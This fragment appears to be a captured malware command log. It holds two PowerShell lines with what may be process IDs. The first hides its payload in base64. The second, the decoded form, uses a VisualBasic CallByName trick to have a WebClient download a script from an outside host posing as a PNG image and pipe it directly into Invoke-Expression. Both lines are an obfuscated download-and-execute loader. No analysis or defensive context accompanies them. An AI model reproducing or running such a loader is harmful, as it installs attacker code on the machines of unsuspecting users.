powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
2632powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"
2768